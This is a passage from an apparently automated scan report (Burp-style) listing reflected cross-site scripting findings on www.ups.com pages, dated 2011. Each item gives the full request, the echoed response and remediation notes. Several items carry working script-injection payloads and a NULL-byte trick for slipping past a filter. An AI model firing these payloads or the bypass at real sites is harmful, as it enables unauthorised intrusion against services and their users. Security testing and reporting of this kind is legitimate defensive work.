Content-Type: text/html; charset=utf-8
Content-Length: 41077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osaba640
7ba9ebff89
/orderSupplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.c
...[SNIP]...

1.161. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 757e7%0a4c6ea7d00f3 was submitted in the REST URL parameter 2. This input was echoed as 757e7
4c6ea7d00f3
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osa/orderSupplies757e7%0a4c6ea7d00f3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41096


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
heForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies757e7
4c6ea7d00f3
?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSu
...[SNIP]...

1.162. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75362"%20a%3db%205c4e0ed9a9d was submitted in the REST URL parameter 2. This input was echoed as 75362" a=b 5c4e0ed9a9d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies75362"%20a%3db%205c4e0ed9a9d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa/orderSupplies75362" a=b 5c4e0ed9a9d?appid=WBSO">
...[SNIP]...

1.163. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4d1'%3b2aeeb4d514c was submitted in the REST URL parameter 2. This input was echoed as 7b4d1';2aeeb4d514c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osa/orderSupplies7b4d1'%3b2aeeb4d514c HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.164. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001b456</script><script>alert(1)</script>dcaf37ce584 was submitted in the loc parameter. This input was echoed as 1b456</script><script>alert(1)</script>dcaf37ce584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%001b456</script><script>alert(1)</script>dcaf37ce584&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9761


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1b456</script><script>alert(1)</script>dcaf37ce584&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b45
...[SNIP]...

1.165. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002cecd'-alert(1)-'557a7bd6f89 was submitted in the loc parameter. This input was echoed as 2cecd'-alert(1)-'557a7bd6f89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%002cecd'-alert(1)-'557a7bd6f89&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9085


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
6f89&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.166. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ca0f2"><script>alert(1)</script>02364017778 was submitted in the loc parameter. This input was echoed as ca0f2"><script>alert(1)</script>02364017778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /osa/orderSupplies?loc=en_US%00ca0f2"><script>alert(1)</script>02364017778&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9661


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_ca0f2"><script>alert(1)</script>02364017778&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_ca0f2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B02364017778%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.167. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0028dc6</script><script>alert(1)</script>564d2e80867 was submitted in the loc parameter. This input was echoed as 28dc6</script><script>alert(1)</script>564d2e80867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%0028dc6</script><script>alert(1)</script>564d2e80867&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15351


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc6</script><script>alert(1)</script>564d2e80867&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_28dc
...[SNIP]...

1.168. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0065b40"><script>alert(1)</script>7de82a96742 was submitted in the loc parameter. This input was echoed as 65b40"><script>alert(1)</script>7de82a96742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%0065b40"><script>alert(1)</script>7de82a96742&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15230


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_65b40"><script>alert(1)</script>7de82a96742&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_65b40%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B7de82a96742%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.169. https://www.ups.com/quantum_services/download [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /quantum_services/download

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00933e4'-alert(1)-'a0dc40a090a was submitted in the loc parameter. This input was echoed as 933e4'-alert(1)-'a0dc40a090a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /quantum_services/download?loc=en_US%00933e4'-alert(1)-'a0dc40a090a&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14525


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
090a&appid=IOVS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_933e4'-alert(1)-'a0dc40a090a&appid=IOVS';
actionUrl = "/one-to-
...[SNIP]...

1.170. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 524bb"%20a%3db%2057ee68500f4 was submitted in the REST URL parameter 1. This input was echoed as 524bb" a=b 57ee68500f4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin524bb"%20a%3db%2057ee68500f4/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin524bb" a=b 57ee68500f4/admin?appid=CVA">
...[SNIP]...

1.171. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8608%0a756b3f1e78a was submitted in the REST URL parameter 1. This input was echoed as f8608
756b3f1e78a
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadminf8608%0a756b3f1e78a/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadminf8608
756b3f1e78a
/admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmi
...[SNIP]...

1.172. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8127'%3b5afbf672e81 was submitted in the REST URL parameter 1. This input was echoed as a8127';5afbf672e81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmina8127'%3b5afbf672e81/admin HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
admin?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmina8127';5afbf672e81/admin?appid=CVA';
actionUrl = "/one-to-
...[SNIP]...

1.173. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 5ce57%0ac1d85533e83 was submitted in the REST URL parameter 2. This input was echoed as 5ce57
c1d85533e83
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qvadmin/admin5ce57%0ac1d85533e83 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44436


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin5ce57
c1d85533e83
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admi
...[SNIP]...

1.174. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /qvadmin/admin

Issue detail

